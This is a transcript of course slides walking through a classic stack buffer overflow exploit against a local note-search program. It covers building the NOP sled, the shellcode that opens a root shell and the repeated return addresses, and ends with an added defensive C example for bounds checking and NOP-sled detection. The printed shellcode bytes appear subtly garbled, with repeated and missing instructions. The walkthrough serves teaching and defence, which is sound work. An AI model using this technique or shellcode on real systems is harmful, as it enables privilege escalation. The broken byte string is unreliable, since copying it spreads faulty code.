Buffer Overflow Walk-Through

Presentation transcript:

Buffer Overflow Walk-Through

The Code

The exploit code names the notesearch program to match the course naming convention, bettersearchnote.exe (line 16 of the exploit source):

    strcpy(command, "./bettersearchnote.exe \'");

Normally, Jose runs the bettersearchnote program to search for notes with keywords of his choosing:

    jose@EC310-VM $ ./bettersearchnote.exe "Life"
    Life is Beautiful

The exploit program is crafted to run the program on his behalf, using the function system(). For example, system("ls") would list the contents of the current directory as though ls had been typed at the command line, except that no one ever enters it at the command prompt:

    jose@EC310-VM $ ls
    unix_basics booksrc work desktop ec310code

system_example.c:

    #include <stdlib.h>

    int main() {
        system("ls");
    }

    jose@EC310-VM $ ./system_example.exe
    unix_basics booksrc work desktop ec310code

Now, let's look at what the exploit program does. It begins with the standard inclusion of C libraries.

The goal of our exploit program is to open a root shell. The shell code is machine language that opens a shell prompt for the user running the program.

First, the set-up: the standard way to start a program and take in command line arguments, which you already know.

Building the stack: these lines declare the variables the program uses, and they are placed on the stack for the main function: the pointers buffer and command, the integer offset (set to 270), the integer ret, the pointer ptr, and the integer i.

Allocating memory on the heap for the string command, which will later be run with the function system(): 200 bytes are allocated on the heap, and the address of that block becomes the value of the pointer command. The bzero function then places 200 0x00 bytes starting at the location to which command points.

Building the string command: this copies the string "./bettersearchnote.exe '" into the location pointed to by the pointer command.

Next we need to find the address where the command line argument for bettersearchnote will start. Take the number of bytes in the current string command, up to the null terminator (24 bytes), add it to the address held in command, and store the resulting address in the pointer buffer (buffer now holds command + 24). This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell.

Specifying our custom return address: the program reads the command line argument to create a custom offset value, but that argument is not used here. It then takes the address of i and subtracts the value of offset; the result is placed in the variable ret (ret = &i - 270) and represents the address of our desired shell code execution entry point.

Then place enough copies of our custom return address in the buffer to overwrite the original return address: the address contained in ret is written at the address pointed to by buffer, repeating every 4 bytes for 40 iterations.

Now the entire heap looks like this: "./bettersearchnote.exe '" followed by the copies of &i-270, then 0x00.

Next create a buffer of filler instructions, called NOPs, to help find the shell code. memset() sets a byte in memory to the value specified; here it puts the value 0x90 into the address pointed to by buffer and into the next 59 addresses as well. 0x90 is machine code for "No Operation", which literally means do nothing.

Now the entire heap looks like this: "./bettersearchnote.exe '" followed by the NOP sled, the remaining copies of &i-270, then 0x00.

Then place our shell code into the buffer immediately following the NOPs: the shell code is copied into memory after the NOP sled.

Now the entire heap looks like this: "./bettersearchnote.exe '" followed by the NOP sled, the newly inserted shell code, the remaining copies of &i-270, then 0x00.

Close the string command with a quote so it is ready to be run by the function system(): a single quote is concatenated at the end of the string command.

Now the string command is finished and ready for execution:

    jose@EC310-VM $ ./bettersearchnote.exe '\x90\x90\x90\x90 ... (60 NOP bytes in all) \x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80 (the shell code) \x&i-270\x&i-270 ... (the remaining copies of the return address)'

bettersearchnote.exe allots 100 characters to searchstring. Its stack frame holds searchstring, fd, printing, user id, sfp, and the return address. The exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring's allotted space, ensuring that one of our custom return addresses replaces the original return address.
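The overflow works because bettersearchnote copies its argument into the 100-byte searchstring without checking the length. The following C program is an added example, not code from the slides or from the course's bettersearchnote source: it shows the bounds check that closes the hole, an overflow_bytes helper that reproduces the slides' own arithmetic (184 bytes into a 100-byte buffer leaves 84 bytes past the end), and a simple detection heuristic that flags a search keyword containing a long run of 0x90 bytes, the NOP sled the slides describe. SEARCHSTRING_SIZE follows the slides' figure of 100; the function names and the sample input are assumptions made for this example.

```c
/* Added example (not from the slides or the course code): the length
 * check bettersearchnote lacks, plus a NOP-sled detector.
 * SEARCHSTRING_SIZE follows the slides' figure of 100 characters;
 * function names and sample data are this example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SEARCHSTRING_SIZE 100   /* bytes the slides say are allotted to searchstring */

/* How many bytes an unchecked strcpy of a command_len-byte string would
 * write beyond a buffer_size-byte buffer (0 if it fits). With the slides'
 * numbers, 184 bytes into 100 gives 84 bytes past the end. */
size_t overflow_bytes(size_t command_len, size_t buffer_size) {
    return command_len > buffer_size ? command_len - buffer_size : 0;
}

/* The fix for the unchecked copy: refuse any argument that does not fit
 * together with its terminating NUL, otherwise copy and report the length. */
int safe_copy_searchstring(char *dst, size_t dst_size, const char *arg) {
    size_t len = strlen(arg);
    if (len >= dst_size)          /* len == dst_size would lose the NUL */
        return -1;
    memcpy(dst, arg, len + 1);    /* length validated above */
    return (int)len;
}

/* Stands in for bettersearchnote's argument handling with the check in place. */
int try_search(const char *arg) {
    char searchstring[SEARCHSTRING_SIZE];
    return safe_copy_searchstring(searchstring, sizeof searchstring, arg);
}

/* Same check on a constructed argument of `len` 'A' bytes (no shell code). */
int try_search_len(size_t len) {
    char *arg = malloc(len + 1);
    int rc;
    if (arg == NULL)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = try_search(arg);
    free(arg);
    return rc;
}

/* Detection heuristic: length of the longest run of 0x90 (NOP) bytes.
 * A long run inside a search keyword is the sled the slides describe. */
size_t longest_nop_run(const unsigned char *data, size_t len) {
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        if (data[i] == 0x90) {
            if (++cur > best)
                best = cur;
        } else {
            cur = 0;
        }
    }
    return best;
}

/* Constructed sample: 60 NOP bytes (the slides' memset count) followed by
 * plain text standing in for the rest of an exploit argument. */
size_t sample_nop_run(void) {
    unsigned char sample[80];
    memset(sample, 0x90, 60);
    memcpy(sample + 60, "not-real-shellcode", 18);
    return longest_nop_run(sample, 78);
}

int main(void) {
    printf("bytes past searchstring for a 184-byte argument: %zu\n",
           overflow_bytes(184, SEARCHSTRING_SIZE));
    printf("\"Life\" copied, length %d\n", try_search("Life"));
    printf("184 'A's rejected: %d\n", try_search_len(184));
    printf("longest NOP run in sample: %zu\n", sample_nop_run());
    return 0;
}
```

The check in safe_copy_searchstring rejects an argument of exactly 100 bytes as well, since the terminating NUL would otherwise land one byte past the buffer; an input-length log line at that rejection point, together with a longest_nop_run threshold, is enough to notice an attempt like the one on the slides rather than silently overwriting the return address.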